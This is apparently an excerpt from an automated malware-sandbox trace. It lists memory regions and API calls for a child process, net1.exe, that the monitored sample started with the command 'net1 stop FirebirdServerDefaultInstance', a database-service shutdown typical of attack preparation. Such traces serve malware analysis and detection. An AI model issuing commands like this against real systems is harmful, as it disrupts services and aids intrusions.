"private_0x00000000050e0000" filename = "" Region: id = 5547 start_va = 0x74a40000 end_va = 0x74a4efff entry_point = 0x74a40000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\SysWOW64\\browcli.dll" (normalized: "c:\\windows\\syswow64\\browcli.dll") Region: id = 5548 start_va = 0x74a50000 end_va = 0x74a63fff entry_point = 0x74a50000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\SysWOW64\\samcli.dll" (normalized: "c:\\windows\\syswow64\\samcli.dll") Region: id = 5549 start_va = 0x74ac0000 end_va = 0x74ac9fff entry_point = 0x74ac0000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\SysWOW64\\netutils.dll" (normalized: "c:\\windows\\syswow64\\netutils.dll") Region: id = 5550 start_va = 0x74ad0000 end_va = 0x74aebfff entry_point = 0x74ad0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\SysWOW64\\srvcli.dll" (normalized: "c:\\windows\\syswow64\\srvcli.dll") Region: id = 5551 start_va = 0x74af0000 end_va = 0x74b0afff entry_point = 0x74af0000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 5552 start_va = 0x74b10000 end_va = 0x74b1ffff entry_point = 0x74b10000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\SysWOW64\\wkscli.dll" (normalized: "c:\\windows\\syswow64\\wkscli.dll") Region: id = 5553 start_va = 0x74b20000 end_va = 0x74b36fff entry_point = 0x74b20000 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\SysWOW64\\mpr.dll" (normalized: "c:\\windows\\syswow64\\mpr.dll") Region: id = 5554 start_va = 0x74b60000 end_va = 0x74b67fff entry_point = 0x74b60000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\SysWOW64\\winnsi.dll" (normalized: "c:\\windows\\syswow64\\winnsi.dll") Region: id = 5555 start_va = 0x74b70000 end_va = 0x74b9ffff entry_point = 0x74b70000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\SysWOW64\\IPHLPAPI.DLL" (normalized: "c:\\windows\\syswow64\\iphlpapi.dll") Region: id = 5556 start_va = 0x74ce0000 end_va = 0x74d38fff entry_point = 0x74ce0000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 5557 start_va = 0x74d40000 end_va = 0x74d49fff entry_point = 0x74d40000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 5558 start_va = 0x74d50000 end_va = 0x74d6dfff entry_point = 0x74d50000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 5559 start_va = 0x76970000 end_va = 0x76ae5fff entry_point = 0x76970000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 5560 start_va = 0x77250000 end_va = 0x77292fff entry_point = 0x77250000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 5561 start_va = 0x77670000 end_va = 0x7775ffff entry_point = 0x77670000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 5562 start_va = 0x77a10000 end_va = 0x77acdfff entry_point = 0x77a10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 5563 start_va = 0x77ad0000 end_va = 0x77ad6fff entry_point = 0x77ad0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll") Region: id = 5564 start_va = 0x77af0000 end_va = 0x77b9bfff entry_point = 0x77af0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 5565 start_va = 0x7f41d000 end_va = 0x7f41ffff entry_point = 0x0 region_type = private name = "private_0x000000007f41d000" filename = "" Region: id = 5566 start_va = 0x7f420000 end_va = 0x7f51ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f420000" filename = "" Region: id = 5567 start_va = 0x7f547000 end_va = 0x7f549fff entry_point = 0x0 region_type = private name = "private_0x000000007f547000" filename = "" Thread: id = 357 os_tid = 0x454 Thread: id = 358 os_tid = 0x8f8 Thread: id = 359 os_tid = 0xd84 Process: id = "88" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0xd86d000" os_pid = "0xd90" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "87" os_parent_pid = "0x764" cmd_line = "C:\\Windows\\system32\\net1 stop FirebirdServerDefaultInstance" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 5568 start_va = 0x720000 end_va = 0x73ffff entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 5569 start_va = 0x740000 end_va = 0x741fff entry_point = 0x0 region_type = private name = "private_0x0000000000740000" filename = "" Region: id = 5570 start_va = 0x750000 end_va = 0x763fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000750000" filename = "" Region: id = 5571 start_va = 0x770000 end_va = 0x7affff entry_point = 0x0 region_type = private name = "private_0x0000000000770000" filename = "" Region: id = 5572 start_va = 0x7b0000 end_va = 0x82ffff entry_point = 0x0 region_type = private name = "private_0x00000000007b0000" filename = "" Region: id = 5573 start_va = 0x830000 end_va = 0x833fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000830000" filename = "" Region: id = 5574 start_va = 0x840000 end_va = 0x840fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000840000" filename = "" Region: id = 5575 start_va = 0x850000 end_va = 0x851fff entry_point = 0x0 region_type = private name = "private_0x0000000000850000" filename = "" Region: id = 5576 start_va = 0x1080000 end_va = 0x10b1fff entry_point = 0x1080000 region_type = mapped_file name = "net1.exe" filename = "\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe") Region: id = 5577 start_va = 0x10c0000 end_va = 0x50bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000010c0000" filename = "" Region: id = 5578 start_va = 0x77c40000 end_va = 0x77db8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 5579 start_va = 0x7f640000 end_va = 0x7f662fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f640000" filename = "" Region: id = 5580 start_va = 0x7f664000 end_va = 0x7f664fff entry_point = 0x0 region_type = private name = "private_0x000000007f664000" filename = "" Region: id = 5581 start_va = 0x7f66c000 end_va = 0x7f66efff entry_point = 0x0 region_type = private name = "private_0x000000007f66c000" filename = "" Region: id = 5582 start_va = 0x7f66f000 end_va = 0x7f66ffff entry_point = 0x0 region_type = private name = "private_0x000000007f66f000" filename = "" Region: id = 5583 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 5584 start_va = 0x7fff0000 end_va = 0x7dfc03e6ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 5585 start_va = 0x7dfc03e70000 end_va = 0x7ffc03e6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfc03e70000" filename = "" Region: id = 5586 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 5587 start_va = 0x7ffc04032000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffc04032000" filename = "" Region: id = 5588 start_va = 0x890000 end_va = 0x89ffff entry_point = 0x0 region_type = private name = "private_0x0000000000890000" filename = "" Region: id = 5589 start_va = 0x59300000 end_va = 0x5934efff entry_point = 0x59300000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 5590 start_va = 0x59360000 end_va = 0x593d2fff entry_point = 0x59360000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 5591 start_va = 0x9e0000 end_va = 0xadffff entry_point = 0x0 region_type = private name = "private_0x00000000009e0000" filename = "" Region: id = 5592 start_va = 0x59350000 end_va = 0x59357fff entry_point = 0x59350000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 5593 start_va = 0x720000 end_va = 0x72ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000720000" filename = "" Region: id = 5594 start_va = 0x730000 end_va = 0x733fff entry_point = 0x0 region_type = private name = "private_0x0000000000730000" filename = "" Region: id = 5595 start_va = 0x8a0000 end_va = 0x95dfff entry_point = 0x8a0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 5596 start_va = 0x960000 end_va = 0x99ffff entry_point = 0x0 region_type = private name = "private_0x0000000000960000" filename = "" Region: id = 5597 start_va = 0x9a0000 end_va = 0x9dffff entry_point = 0x0 region_type = private name = "private_0x00000000009a0000" filename = "" Region: id = 5598 start_va = 0xae0000 end_va = 0xb5ffff entry_point = 0x0 region_type = private name = "private_0x0000000000ae0000" filename = "" Region: id = 5599 start_va = 0xb60000 end_va = 0xbdffff entry_point = 0x0 region_type = private name = "private_0x0000000000b60000" filename = "" Region: id = 5600 start_va = 0xc50000 end_va = 0xc5ffff entry_point = 0x0 region_type = private name = "private_0x0000000000c50000" filename = "" Region: id = 5601 start_va = 0x74a00000 end_va = 0x74a07fff entry_point = 0x74a00000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\SysWOW64\\dsrole.dll" (normalized: "c:\\windows\\syswow64\\dsrole.dll") Region: id = 5602 start_va = 0x74a10000 end_va = 0x74a3efff entry_point = 0x74a10000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\SysWOW64\\logoncli.dll" (normalized: "c:\\windows\\syswow64\\logoncli.dll") Region: id = 5603 start_va = 0x74a40000 end_va = 0x74a4efff entry_point = 0x74a40000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\SysWOW64\\browcli.dll" (normalized: "c:\\windows\\syswow64\\browcli.dll") Region: id = 5604 start_va = 0x74a50000 end_va = 0x74a63fff entry_point = 0x74a50000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\SysWOW64\\samcli.dll" (normalized: "c:\\windows\\syswow64\\samcli.dll") Region: id = 5605 start_va = 0x74ac0000 end_va = 0x74ac9fff entry_point = 0x74ac0000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\SysWOW64\\netutils.dll" (normalized: "c:\\windows\\syswow64\\netutils.dll") Region: id = 5606 start_va = 0x74ad0000 end_va = 0x74aebfff entry_point = 0x74ad0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\SysWOW64\\srvcli.dll" (normalized: "c:\\windows\\syswow64\\srvcli.dll") Region: id = 5607 start_va = 0x74af0000 end_va = 0x74b0afff entry_point = 0x74af0000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 5608 start_va = 0x74b10000 end_va = 0x74b1ffff entry_point = 0x74b10000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\SysWOW64\\wkscli.dll" (normalized: "c:\\windows\\syswow64\\wkscli.dll") Region: id = 5609 start_va = 0x74ce0000 end_va = 0x74d38fff entry_point = 0x74ce0000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 5610 start_va = 0x74d40000 end_va = 0x74d49fff entry_point = 0x74d40000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 5611 start_va = 0x74d50000 end_va = 0x74d6dfff entry_point = 0x74d50000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 5612 start_va = 0x76970000 end_va = 0x76ae5fff entry_point = 0x76970000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 5613 start_va = 0x77250000 end_va = 0x77292fff entry_point = 0x77250000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 5614 start_va = 0x77670000 end_va = 0x7775ffff entry_point = 0x77670000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 5615 start_va = 0x77a10000 end_va = 0x77acdfff entry_point = 0x77a10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 5616 start_va = 0x77af0000 end_va = 0x77b9bfff entry_point = 0x77af0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 5617 start_va = 0x7f540000 end_va = 0x7f63ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f540000" filename = "" Region: id = 5618 start_va = 0x7f666000 end_va = 0x7f668fff entry_point = 0x0 region_type = private name = "private_0x000000007f666000" filename = "" Region: id = 5619 start_va = 0x7f669000 end_va = 0x7f66bfff entry_point = 0x0 region_type = private name = "private_0x000000007f669000" filename = "" Region: id = 5620 start_va = 0x740000 end_va = 0x743fff entry_point = 0x0 region_type = private name = "private_0x0000000000740000" filename = "" Region: id = 5621 start_va = 0x860000 end_va = 0x862fff entry_point = 0x860000 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\SysWOW64\\netmsg.dll" (normalized: "c:\\windows\\syswow64\\netmsg.dll") Region: id = 5622 start_va = 0xbe0000 end_va = 0xc11fff entry_point = 0xbe0000 region_type = mapped_file name = "netmsg.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\netmsg.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\netmsg.dll.mui") Thread: id = 360 os_tid = 0xd80 [0126.684] GetModuleHandleA (lpModuleName=0x0) returned 0x1080000 [0126.684] __set_app_type (_Type=0x1) [0126.684] __p__fmode () returned 0x77ac4d6c [0126.684] __p__commode () returned 0x77ac5b1c [0126.684] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x1087020) returned 0x0 [0126.684] __getmainargs (in: _Argc=0x109f688, _Argv=0x109f68c, _Env=0x109f690, _DoWildCard=0, _StartInfo=0x109f69c | out: _Argc=0x109f688, _Argv=0x109f68c, _Env=0x109f690) returned 0 [0126.684] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0126.684] GetConsoleOutputCP () returned 0x1b5 [0126.685] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x10a7020 | out: lpCPInfo=0x10a7020) returned 1 [0126.685] SetThreadUILanguage (LangId=0x0) returned 0x409 [0126.687] sprintf_s (in: _DstBuf=0x82fe1c, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0126.687] setlocale (category=0, locale=".437") returned="English_United States.437" [0126.688] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0126.688] GetStdHandle (nStdHandle=0xfffffff4) returned 0x40 [0126.688] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop FirebirdServerDefaultInstance" [0126.688] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x82fbc4, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0126.689] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x82fbb8 | out: Buffer=0x82fbb8*=0x9e7f88) returned 0x0 [0126.689] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x82fbbc | out: Buffer=0x82fbbc*=0x9e80f0) returned 0x0 [0126.689] __iob_func () returned 0x77ac1208 [0126.689] _fileno (_File=0x77ac1208) returned 0 [0126.689] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0126.689] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0126.689] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0126.689] _wcsicmp (_String1="config", _String2="stop") returned -16 [0126.689] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0126.689] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0126.689] _wcsicmp (_String1="file", _String2="stop") returned -13 [0126.689] _wcsicmp (_String1="files", _String2="stop") returned -13 [0126.689] _wcsicmp (_String1="group", _String2="stop") returned -12 [0126.689] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0126.689] _wcsicmp (_String1="help", _String2="stop") returned -11 [0126.689] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0126.689] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0126.689] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0126.689] _wcsicmp (_String1="session", _String2="stop") returned -15 [0126.689] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0126.689] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0126.689] _wcsicmp (_String1="share", _String2="stop") returned -12 [0126.689] _wcsicmp (_String1="start", _String2="stop") returned -14 [0126.689] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0126.689] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0126.689] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0126.689] _wcsicmp (_String1="accounts", _String2="FirebirdServerDefaultInstance") returned -5 [0126.689] _wcsicmp (_String1="computer", _String2="FirebirdServerDefaultInstance") returned -3 [0126.689] _wcsicmp (_String1="config", _String2="FirebirdServerDefaultInstance") returned -3 [0126.689] _wcsicmp (_String1="continue", _String2="FirebirdServerDefaultInstance") returned -3 [0126.689] _wcsicmp (_String1="cont", _String2="FirebirdServerDefaultInstance") returned -3 [0126.689] _wcsicmp (_String1="file", _String2="FirebirdServerDefaultInstance") returned -6 [0126.689] _wcsicmp (_String1="files", _String2="FirebirdServerDefaultInstance") returned -6 [0126.689] _wcsicmp (_String1="group", _String2="FirebirdServerDefaultInstance") returned 1 [0126.689] _wcsicmp (_String1="groups", _String2="FirebirdServerDefaultInstance") returned 1 [0126.689] _wcsicmp (_String1="help", _String2="FirebirdServerDefaultInstance") returned 2 [0126.689] _wcsicmp (_String1="helpmsg", _String2="FirebirdServerDefaultInstance") returned 2 [0126.689] _wcsicmp (_String1="localgroup", _String2="FirebirdServerDefaultInstance") returned 6 [0126.689] _wcsicmp (_String1="pause", _String2="FirebirdServerDefaultInstance") returned 10 [0126.689] _wcsicmp (_String1="session", _String2="FirebirdServerDefaultInstance") returned 13 [0126.689] _wcsicmp (_String1="sessions", _String2="FirebirdServerDefaultInstance") returned 13 [0126.689] _wcsicmp (_String1="sess", _String2="FirebirdServerDefaultInstance") returned 13 [0126.689] _wcsicmp (_String1="share", _String2="FirebirdServerDefaultInstance") returned 13 [0126.689] _wcsicmp (_String1="start", _String2="FirebirdServerDefaultInstance") returned 13 [0126.689] _wcsicmp (_String1="stats", _String2="FirebirdServerDefaultInstance") returned 13 [0126.689] _wcsicmp (_String1="statistics", _String2="FirebirdServerDefaultInstance") returned 13 [0126.690] _wcsicmp (_String1="stop", _String2="FirebirdServerDefaultInstance") returned 13 [0126.690] _wcsicmp (_String1="time", _String2="FirebirdServerDefaultInstance") returned 14 [0126.690] _wcsicmp (_String1="user", _String2="FirebirdServerDefaultInstance") returned 15 [0126.690] _wcsicmp (_String1="users", _String2="FirebirdServerDefaultInstance") returned 15 [0126.690] _wcsicmp (_String1="msg", _String2="FirebirdServerDefaultInstance") returned 7 [0126.690] _wcsicmp (_String1="messenger", _String2="FirebirdServerDefaultInstance") returned 7 [0126.690] _wcsicmp (_String1="receiver", _String2="FirebirdServerDefaultInstance") returned 12 [0126.690] _wcsicmp (_String1="rcv", _String2="FirebirdServerDefaultInstance") returned 12 [0126.690] _wcsicmp (_String1="netpopup", _String2="FirebirdServerDefaultInstance") returned 8 [0126.690] _wcsicmp (_String1="redirector", _String2="FirebirdServerDefaultInstance") returned 12 [0126.690] _wcsicmp (_String1="redir", _String2="FirebirdServerDefaultInstance") returned 12 [0126.690] _wcsicmp (_String1="rdr", _String2="FirebirdServerDefaultInstance") returned 12 [0126.690] _wcsicmp (_String1=0x1081ffc, _String2="FirebirdServerDefaultInstance") returned 17 [0126.690] _wcsicmp (_String1="work", _String2="FirebirdServerDefaultInstance") returned 17 [0126.690] _wcsicmp (_String1="wksta", _String2="FirebirdServerDefaultInstance") returned 17 [0126.690] _wcsicmp (_String1="prdr", _String2="FirebirdServerDefaultInstance") returned 10 [0126.690] _wcsicmp (_String1="devrdr", _String2="FirebirdServerDefaultInstance") returned -2 [0126.690] _wcsicmp (_String1="lanmanworkstation", _String2="FirebirdServerDefaultInstance") returned 6 [0126.690] _wcsicmp (_String1="server", _String2="FirebirdServerDefaultInstance") returned 13 [0126.690] _wcsicmp (_String1="svr", _String2="FirebirdServerDefaultInstance") returned 13 [0126.690] _wcsicmp (_String1="srv", _String2="FirebirdServerDefaultInstance") returned 13 [0126.690] _wcsicmp (_String1="lanmanserver", _String2="FirebirdServerDefaultInstance") returned 6 [0126.690] _wcsicmp (_String1="alerter", _String2="FirebirdServerDefaultInstance") returned -5 [0126.690] _wcsicmp (_String1="netlogon", _String2="FirebirdServerDefaultInstance") returned 8 [0126.690] _wcsupr (in: _String="FirebirdServerDefaultInstance" | out: _String="FIREBIRDSERVERDEFAULTINSTANCE") returned="FIREBIRDSERVERDEFAULTINSTANCE" [0126.690] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x9e2650 [0126.692] GetServiceKeyNameW (in: hSCManager=0x9e2650, lpDisplayName="FIREBIRDSERVERDEFAULTINSTANCE", lpServiceName=0x10a8cb0, lpcchBuffer=0x82fb34 | out: lpServiceName="", lpcchBuffer=0x82fb34) returned 0 [0126.693] _wcsicmp (_String1="msg", _String2="FIREBIRDSERVERDEFAULTINSTANCE") returned 7 [0126.693] _wcsicmp (_String1="messenger", _String2="FIREBIRDSERVERDEFAULTINSTANCE") returned 7 [0126.693] _wcsicmp (_String1="receiver", _String2="FIREBIRDSERVERDEFAULTINSTANCE") returned 12 [0126.693] _wcsicmp (_String1="rcv", _String2="FIREBIRDSERVERDEFAULTINSTANCE") returned 12 [0126.693] _wcsicmp (_String1="redirector", _String2="FIREBIRDSERVERDEFAULTINSTANCE") returned 12 [0126.693] _wcsicmp (_String1="redir", _String2="FIREBIRDSERVERDEFAULTINSTANCE") returned 12 [0126.693] _wcsicmp (_String1="rdr", _String2="FIREBIRDSERVERDEFAULTINSTANCE") returned 12 [0126.693] _wcsicmp (_String1="workstation", _String2="FIREBIRDSERVERDEFAULTINSTANCE") returned 17 [0126.693] _wcsicmp (_String1="work", _String2="FIREBIRDSERVERDEFAULTINSTANCE") returned 17 [0126.693] _wcsicmp (_String1="wksta", _String2="FIREBIRDSERVERDEFAULTINSTANCE") returned 17 [0126.693] _wcsicmp (_String1="prdr", _String2="FIREBIRDSERVERDEFAULTINSTANCE") returned 10 [0126.693] _wcsicmp (_String1="devrdr", _String2="FIREBIRDSERVERDEFAULTINSTANCE") returned -2 [0126.693] _wcsicmp (_String1="lanmanworkstation", _String2="FIREBIRDSERVERDEFAULTINSTANCE") returned 6 [0126.693] _wcsicmp (_String1="server", _String2="FIREBIRDSERVERDEFAULTINSTANCE") returned 13 [0126.693] _wcsicmp (_String1="svr", _String2="FIREBIRDSERVERDEFAULTINSTANCE") returned 13 [0126.693] _wcsicmp (_String1="srv", _String2="FIREBIRDSERVERDEFAULTINSTANCE") returned 13 [0126.693] _wcsicmp (_String1="lanmanserver", _String2="FIREBIRDSERVERDEFAULTINSTANCE") returned 6 [0126.693] _wcsicmp (_String1="alerter", _String2="FIREBIRDSERVERDEFAULTINSTANCE") returned -5 [0126.693] _wcsicmp (_String1="netlogon", _String2="FIREBIRDSERVERDEFAULTINSTANCE") returned 8 [0126.693] _wcsicmp (_String1="FIREBIRDSERVERDEFAULTINSTANCE", _String2="WORKSTATION") returned -17 [0126.693] _wcsicmp (_String1="FIREBIRDSERVERDEFAULTINSTANCE", _String2="LanmanWorkstation") returned -6 [0126.693] _wcsicmp (_String1="FIREBIRDSERVERDEFAULTINSTANCE", _String2="SERVER") returned -13 [0126.693] _wcsicmp (_String1="FIREBIRDSERVERDEFAULTINSTANCE", _String2="LanmanServer") returned -6 [0126.693] _wcsicmp (_String1="FIREBIRDSERVERDEFAULTINSTANCE", _String2="BROWSER") returned 4 [0126.693] _wcsicmp (_String1="FIREBIRDSERVERDEFAULTINSTANCE", _String2="BROWSER") returned 4 [0126.693] _wcsicmp (_String1="FIREBIRDSERVERDEFAULTINSTANCE", _String2="MESSENGER") returned -7 [0126.693] _wcsicmp (_String1="FIREBIRDSERVERDEFAULTINSTANCE", _String2="MESSENGER") returned -7 [0126.693] _wcsicmp (_String1="FIREBIRDSERVERDEFAULTINSTANCE", _String2="NETRUN") returned -8 [0126.693] _wcsicmp (_String1="FIREBIRDSERVERDEFAULTINSTANCE", _String2="NETRUN") returned -8 [0126.693] _wcsicmp (_String1="FIREBIRDSERVERDEFAULTINSTANCE", _String2="SPOOLER") returned -13 [0126.693] _wcsicmp (_String1="FIREBIRDSERVERDEFAULTINSTANCE", _String2="SPOOLER") returned -13 [0126.693] _wcsicmp (_String1="FIREBIRDSERVERDEFAULTINSTANCE", _String2="ALERTER") returned 5 [0126.693] _wcsicmp (_String1="FIREBIRDSERVERDEFAULTINSTANCE", _String2="ALERTER") returned 5 [0126.693] _wcsicmp (_String1="FIREBIRDSERVERDEFAULTINSTANCE", _String2="NETLOGON") returned -8 [0126.693] _wcsicmp (_String1="FIREBIRDSERVERDEFAULTINSTANCE", _String2="NETLOGON") returned -8 [0126.693] _wcsicmp (_String1="FIREBIRDSERVERDEFAULTINSTANCE", _String2="NETPOPUP") returned -8 [0126.693] _wcsicmp (_String1="FIREBIRDSERVERDEFAULTINSTANCE", _String2="NETPOPUP") returned -8 [0126.693] _wcsicmp (_String1="FIREBIRDSERVERDEFAULTINSTANCE", _String2="SQLSERVER") returned -13 [0126.693] _wcsicmp (_String1="FIREBIRDSERVERDEFAULTINSTANCE", _String2="SQLSERVER") returned -13 [0126.693] _wcsicmp (_String1="FIREBIRDSERVERDEFAULTINSTANCE", _String2="REPLICATOR") returned -12 [0126.693] _wcsicmp (_String1="FIREBIRDSERVERDEFAULTINSTANCE", _String2="REPLICATOR") returned -12 [0126.693] _wcsicmp (_String1="FIREBIRDSERVERDEFAULTINSTANCE", _String2="REMOTEBOOT") returned -12 [0126.694] _wcsicmp (_String1="FIREBIRDSERVERDEFAULTINSTANCE", _String2="REMOTEBOOT") returned -12 [0126.694] _wcsicmp (_String1="FIREBIRDSERVERDEFAULTINSTANCE", _String2="TIMESOURCE") returned -14 [0126.694] _wcsicmp (_String1="FIREBIRDSERVERDEFAULTINSTANCE", _String2="TIMESOURCE") returned -14 [0126.694] _wcsicmp (_String1="FIREBIRDSERVERDEFAULTINSTANCE", _String2="AFP") returned 5 [0126.694] _wcsicmp (_String1="FIREBIRDSERVERDEFAULTINSTANCE", _String2="AFP") returned 5 [0126.694] _wcsicmp (_String1="FIREBIRDSERVERDEFAULTINSTANCE", _String2="UPS") returned -15 [0126.694] _wcsicmp (_String1="FIREBIRDSERVERDEFAULTINSTANCE", _String2="UPS") returned -15 [0126.694] _wcsicmp (_String1="FIREBIRDSERVERDEFAULTINSTANCE", _String2="XACTSRV") returned -18 [0126.694] 